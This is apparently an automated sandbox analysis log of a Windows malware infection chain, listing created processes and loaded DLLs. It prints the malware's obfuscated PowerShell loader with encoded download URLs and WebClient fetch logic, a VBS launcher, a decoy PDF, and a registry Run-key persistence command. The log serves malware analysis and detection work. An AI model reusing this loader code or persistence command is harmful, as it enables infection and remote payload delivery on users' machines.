HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUnet .,mDMooSlwA.n lStoGaaOrd OFIni elAdeAt( n$CaAS mGom vuPsnT,iOrt SiP o OnL.sInfE a Fbpir.yiMak tkM eminGls a,Rh$MyO.ykInsT.e ojReeBa)';$Okseje=$Lyonetia;auspiciums (Hjemmemarkedernes '.a$Kog.eL oo ABBeAF,lUn: EU,tN kAFrdXeDVaUVecCoe.ga,sB,olAfe ,=,y(PaTK ETesLeTSt-PrpMeaUnT CH B Sl$ o UK esFrEP JUnEFn)');whilJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\romerret.vbs" Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Schr. an GGV bzgl. Schadenersatzes.pdf"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Boernehjaelpsdag='Flerbrugerudgaver';;$Anekdotiskes='Kvajer';;$Apathia='Gunbuilder';;$Meterologisk='Billioners174';;$Paracelsianism='Intervertebra';;$Claritude=$host.Name;function Ructation($Krselstiderne){If ($Claritude) {$Slutdatoerne=2} for ($Unglamorously=$Slutdatoerne;;$Unglamorously+=3){if(!$Krselstiderne[$Unglamorously]) { break }$Buckland+=$Krselstiderne[$Unglamorously]}$Buckland}function Fashioneringer($Marins){ .($Clodpoles) ($Marins)}$Paydays=Ructation ' ln eamtSp. yW BEreb C uL SiLeeDoNTrT';$Nedsivningsbekendtgrelsernes=Ructation 'FuMCroDazI iMelGolDeaSl/';$Kongeparrets=Ructation ' MTRilI.sr 1 f2';$Dorbugs28='An[ManP,e StBa. .sTmE RR ivTii c oERaP.ioC iF N UT.om Ac N,ea RGBeEAnrA ]Hy:Be:U.sKoENaC ouRaRMiiS T DYOmpStrA,o TReoPrCVeOHaLte=st$MoKBeoarnTiGRaE p .AKaRN RCrEdiTN.s';$Nedsivningsbekendtgrelsernes+=Ructation 'Bi5W .Re0Wi (PeWDiiManAnd okawMas S ,tN .TKa Fo1 U0 R.D,0 G;Py MaWHoiFin o6vr4.n;gr Krx .6Be4C.; arA vUn: S1Me3S 1 D.b 0W,) . uG ae LcDikInoBr/ u2.s0 .1Fu0 ,0 C1Gl0.a1Be VeFRii .rTreKaf.oo .x H/A 1Gn3 u1Pe.Ek0';$trevrelserslejligheds=Ructation 'O,U SB EbrRD -B,aSkGAfE Kn Ut';$Fishgrass=Ructation 'Gehs.tStt.ppSksEs:C /t,/ ,wSowDew r.HueAllQuePhk JtRerFro,rs eserU vPaiUnc HeVi-GanJ e uO rdyu DpD pQui n o.AkdE eFl/LnfBriFulR eHaa adRam RiPon.a/T wU o jl.rtBieBoreq/ ,O vDie arHop,ya Eir nF f CuT,lBo.T aUnfDem';$Korporal=Ructation 'Re>';$Clodpoles=Ructation 'UniD EguX';$Overgrnserne='Orthopterological';$Undladelsers='\Milieuplanerne.Chl';Fashioneringer (Ructation 'Fy$FrGElL FoNib iaRaL,t:FoUP nMovFoAhyl ISedP l ,yR,= S$R EA nK v :Ova P.apamdAmaMeTMoAba+ a$PhU anUpdy,lsua BDdieLdL sSKle kRUnS');Fashioneringer (Ructation '.r$EkgcaL ,oTeBPaa Dl U: aFMarAfE TMIdTUnvSku nN PGOveSnt u= m$ LfCuIlas Dh CgOvRHaASpSFoSAs. BsExP olcyIPoTop( u$LakIno RLePgno SrM.ABel I)');Fashioneringer (Ructation $Dorbugs28);$Fishgrass=$Fremtvunget[0];$Tilmeldtes=(Ructation 'Op$EcgInlA o eBB aOxLSt: ,GS.a iRSkAHymBlOR Nr,DTh= ON.rE rWB -V oBobByJ.rENoCFit PrsStYT sDiT uEEnmF,.Tr$AfpPaA aY GdG a sy s');Fashioneringer ($Tilmeldtes);Fashioneringer (Ructation 'Ep$PagFjaForLuaA.mOvo enP d O.ovHRieP aF dBoemor.esPe[ u$RetArr Le Tv vr.reRel is ,e ir .sStlAeeT j lSii gAnhTreStdB sDe]Pa=D $ NAmeEld.usB i.iv.unEfiE nMagC,sPrb meb,kAne rnS,d tUfg kr.oe Ll BsIneSlrK.nPre Ms');$Almugs=Ructation 'Sp$Nogska IrAraItm PoPen SdAm. aDCeo iwEpn Pl ao Na edB FDii ol.reMo(Yd$ FFP.iP,sPah g.or.aaSos WsLa,Im$ TSA.t naLnt,us b.ae Ms gAfe fnPre sS )';$Statsbesgenes=$Unvalidly;Fashioneringer (Ructation 'Ha$ GArLNeoBrB CaHaLTe:abIPrdBee ,aRelMeiSaZSpeSer.r= ,( STSteGes aTRe-TrpNaaT TKohAc S $ ,SAntInADgt SsRaBMoe CsMegBie RN de.fSEf)');while (!$Idealizer) {Fashioneringer (Ructation ' k$ SgNol PoAnb Sa dl.e: hA.upEntK,e.wrFeiOpn gFaeSkrYnnb eo s ,=,k$PlH oyChlReeStr.qn .esusVa5Pl4') ;Fashioneringer $Almugs;Fashioneringer (RuctatioJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2124 --field-trial-handle=1756,i,10988508306873604360,9647828902671235377,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
